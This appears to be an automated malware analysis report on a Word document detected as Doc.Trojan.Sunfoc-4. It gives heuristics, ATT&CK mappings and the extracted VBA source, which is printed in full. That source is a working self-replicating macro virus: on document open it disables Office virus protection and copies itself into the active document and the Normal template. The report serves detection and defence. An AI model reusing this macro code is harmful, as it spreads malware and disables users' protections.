MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro attempts to disable virus protection and replicate its code into other documents and templates, which is a common tactic for malware propagation and persistence. The ClamAV detection further confirms its malicious nature.
Heuristics 4
-
ClamAV: Doc.Trojan.Sunfoc-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Sunfoc-4
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
If B <> 1 Then D.DeleteLines 1, D.CountOfLines -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 748 bytes |
SHA-256: 1e020884142223772e7b01a350b7a6ee0fc6aa1892a1a1e9d891ac786c0231a5 |
|||
|
Detection
ClamAV:
Doc.Trojan.Sunfoc-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Set A = Options A.VirusProtection = 0 A.SaveNormalPrompt = 0 A.ConfirmConversions = 0 For B = 1 To 3 If B = 1 Then Set C = ThisDocument If B = 2 Then Set C = ActiveDocument If B = 3 Then Set C = NormalTemplate Set D = C.VBProject.VBComponents.Item(1).CodeModule If B = 1 Then E = D.Lines(1, D.CountOfLines) If B <> 1 Then D.DeleteLines 1, D.CountOfLines If B <> 1 Then D.Addfromstring E Next ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.